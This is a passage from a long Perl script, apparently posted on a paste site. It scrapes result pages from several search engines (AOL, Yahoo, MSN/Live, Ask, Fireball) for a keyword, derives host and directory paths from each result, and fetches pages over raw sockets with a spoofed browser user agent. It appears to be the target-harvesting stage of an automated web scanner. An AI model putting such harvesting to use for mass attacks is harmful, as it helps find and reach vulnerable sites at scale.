  1421. while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
  1422. my $k=$1;
  1423. my @grep=links($k);
  1424. push(@lst,@grep);
  1425. }}
  1426. return @lst;
  1427. }
  1428.  
  1429. sub aolb(){
  1430. my @lst;
  1431. my $key = $_[0];
  1432. for($b=1;$b<=59;$b+=1){
  1433. my $AoL=("http://64.12.129.44/aol/search?query=".key($key)."&page=".$b."&count_override=20&lr=lang_de");
  1434. my $Res=query($AoL);
  1435. while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
  1436. my $k=$1;
  1437. my @grep=links($k);
  1438. push(@lst,@grep);
  1439. }}
  1440. return @lst;
  1441. }
  1442.  
  1443. sub aolc(){
  1444. my @lst;
  1445. my $key = $_[0];
  1446. for($b=1;$b<=59;$b+=1){
  1447. my $AoL=("http://64.12.129.44/aol/search?query=".key($key)."&page=".$b."&count_override=20&lr=lang_fr");
  1448. my $Res=query($AoL);
  1449. while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
  1450. my $k=$1;
  1451. my @grep=links($k);
  1452. push(@lst,@grep);
  1453. }}
  1454. return @lst;
  1455. }
  1456.  
  1457. #####
  1458. # SUBS Yahoo
  1459. #####
  1460. sub yahoo(){
  1461. my @lst;
  1462. my $key = $_[0];
  1463. for($b=1;$b<=1000;$b+=100){
  1464. my $Ya=("http://search.yahoo.com/search?ei=UTF-8&p=".key($key)."&n=100&fr=sfp&b=".$b);
  1465. my $Res=query($Ya);
  1466. while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){
  1467. my $k=$1;
  1468. $k=~s/<b>//g;
  1469. $k=~s/<\/b>//g;
  1470. $k=~s/<wbr>//g;
  1471. my @grep=links($k);
  1472. push(@lst,@grep);
  1473. }}
  1474. return @lst;
  1475. }
  1476.  
  1477. sub yahooa(){
  1478. my @lst;
  1479. my $key = $_[0];
  1480. for($b=210;$b<=1000;$b+=210){
  1481. my $Ya=("http://search.yahoo.com/search?ei=UTF-8&p=".key($key)."&n=100&fr=sfp&b=".$b);
  1482. my $Res=query($Ya);
  1483. while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){
  1484. my $k=$1;
  1485. $k=~s/<b>//g;
  1486. $k=~s/<\/b>//g;
  1487. $k=~s/<wbr>//g;
  1488. my @grep=links($k);
  1489. push(@lst,@grep);
  1490. }}
  1491. return @lst;
  1492. }
  1493.  
  1494. sub yahoob(){
  1495. my @lst;
  1496. my $key = $_[0];
  1497. for($b=410;$b<=1000;$b+=210){
  1498. my $Ya=("http://search.yahoo.com/search?ei=UTF-8&p=".key($key)."&n=100&fr=sfp&b=".$b);
  1499. my $Res=query($Ya);
  1500. while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){
  1501. my $k=$1;
  1502. $k=~s/<b>//g;
  1503. $k=~s/<\/b>//g;
  1504. $k=~s/<wbr>//g;
  1505. my @grep=links($k);
  1506. push(@lst,@grep);
  1507. }}
  1508. return @lst;
  1509. }
  1510.  
  1511. sub yahooc(){
  1512. my @lst;
  1513. my $key = $_[0];
  1514. for($b=610;$b<=1000;$b+=210){
  1515. my $Ya=("http://search.yahoo.com/search?ei=UTF-8&p=".key($key)."&n=100&fr=sfp&b=".$b);
  1516. my $Res=query($Ya);
  1517. while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){
  1518. my $k=$1;
  1519. $k=~s/<b>//g;
  1520. $k=~s/<\/b>//g;
  1521. $k=~s/<wbr>//g;
  1522. my @grep=links($k);
  1523. push(@lst,@grep);
  1524. }}
  1525. return @lst;
  1526. }
  1527.  
  1528. sub yahood(){
  1529. my @lst;
  1530. my $key = $_[0];
  1531. for($b=810;$b<=1000;$b+=210){
  1532. my $Ya=("http://search.yahoo.com/search?ei=UTF-8&p=".key($key)."&n=100&fr=sfp&b=".$b);
  1533. my $Res=query($Ya);
  1534. while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){
  1535. my $k=$1;
  1536. $k=~s/<b>//g;
  1537. $k=~s/<\/b>//g;
  1538. $k=~s/<wbr>//g;
  1539. my @grep=links($k);
  1540. push(@lst,@grep);
  1541. }}
  1542. return @lst;
  1543. }
  1544.  
  1545. #####
  1546. # SUBS MSN
  1547. #####
  1548. sub msn(){
  1549. my @lst;
  1550. my $key = $_[0];
  1551. for($b=1;$b<=1000;$b+=10){
  1552. my $MsN=("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE");
  1553. my $Res=query($MsN);
  1554. while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
  1555. if($1 !~ /msn|live/){
  1556. my $k=$1;
  1557. my @grep=links($k);
  1558. push(@lst,@grep);
  1559. }}}
  1560. return @lst;
  1561. }
  1562.  
  1563. #####
  1564. # SUBS ASK
  1565. #####
  1566. sub ask(){
  1567. my @lst;
  1568. my $key=$_[0];
  1569. my $i=0;
  1570. my $pg=0;
  1571. for($i=0; $i<=1000; $i+=10)
  1572. {
  1573. my $Ask=("http://it.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all");
  1574. my $Res=query($Ask);
  1575. while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){
  1576. my $k=$3;
  1577. $k=~s/[\"\ ]//g;
  1578. my @grep=links($k);
  1579. push(@lst,@grep);
  1580. }}
  1581. return @lst;
  1582. }
  1583.  
  1584. #####
  1585. # SUBS FireBall
  1586. #####
  1587. sub fireball(){
  1588. my $key=$_[0];
  1589. my $inizio=1;
  1590. my $pagine=200;
  1591. my @lst;
  1592. my $av=0;
  1593. while($inizio <= $pagine){
  1594. my $fireball="http://suche.fireball.de/cgi-bin/pursuit?pag=$av&query=".key($key)."&cat=fb_loc&idx=all&enc=utf-8";
  1595. my $Res=query($fireball);
  1596. while ($Res=~ m/<a href=\"?http:\/\/(.+?)\//g ){
  1597. if ($1 !~ /msn|live|google|yahoo/){
  1598. my $k="$1/";
  1599. my @grep=links($k);
  1600. push(@lst,@grep);
  1601. }}
  1602. $av=$av+10;
  1603. $inizio++;
  1604. }
  1605. return @lst;
  1606. }
  1607.  
  1608.  
  1609. sub links()
  1610. {
  1611. my @l;
  1612. my $link=$_[0];
  1613. my $host=$_[0];
  1614. my $hdir=$_[0];
  1615. $hdir=~s/(.*)\/[^\/]*$/\1/;
  1616. $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  1617. $host.="/";
  1618. $link.="/";
  1619. $hdir.="/";
  1620. $host=~s/\/\//\//g;
  1621. $hdir=~s/\/\//\//g;
  1622. $link=~s/\/\//\//g;
  1623. push(@l,$link,$host,$hdir);
  1624. return @l;
  1625. }
  1626.  
  1627. sub geths(){
  1628. my $host=$_[0];
  1629. $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  1630. return $host;
  1631. }
  1632.  
  1633. sub key(){
  1634. my $chiave=$_[0];
  1635. $chiave =~ s/ /\+/g;
  1636. $chiave =~ s/:/\%3A/g;
  1637. $chiave =~ s/\//\%2F/g;
  1638. $chiave =~ s/&/\%26/g;
  1639. $chiave =~ s/\"/\%22/g;
  1640. $chiave =~ s/,/\%2C/g;
  1641. $chiave =~ s/\\/\%5C/g;
  1642. return $chiave;
  1643. }
  1644.  
  1645. sub query($){
  1646. my $url=$_[0];
  1647. $url=~s/http:\/\///;
  1648. my $host=$url;
  1649. my $query=$url;
  1650. my $page="";
  1651. $host=~s/href=\"?http:\/\///;
  1652. $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  1653. $query=~s/$host//;
  1654. if ($query eq "") {$query="/";};
  1655. eval {
  1656. my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
  1657. print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
  1658. my @r = <$sock>;
  1659. $page="@r";
  1660. close($sock);
  1661. };
  1662. return $page;
  1663. }
  1664.  
  1665. sub unici{
  1666. my @unici = ();
  1667. my %visti = ();
  1668. foreach my $elemento ( @_ )
  1669. {
  1670. next if $visti{ $elemento }++;
  1671. push @unici, $elemento;
  1672. }  
  1673. return @unici;
  1674. }
  1675.  
  1676. sub http_query($){
  1677. my ($url) = @_;
  1678. my $host=$url;
  1679. my $query=$url;
  1680. my $page="";
  1681. $host =~ s/href=\"?http:\/\///;
  1682. $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  1683. $query =~s/$host//;
  1684. if ($query eq "") {$query="/";};
  1685. eval {
  1686. local $SIG{ALRM} = sub { die "1";};
  1687. alarm 10;
  1688. my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
  1689. print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
  1690. my @r = <$sock>;
  1691. $page="@r";
  1692. alarm 0;
  1693. close($sock);
  1694. };
  1695. return $page;
  1696. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement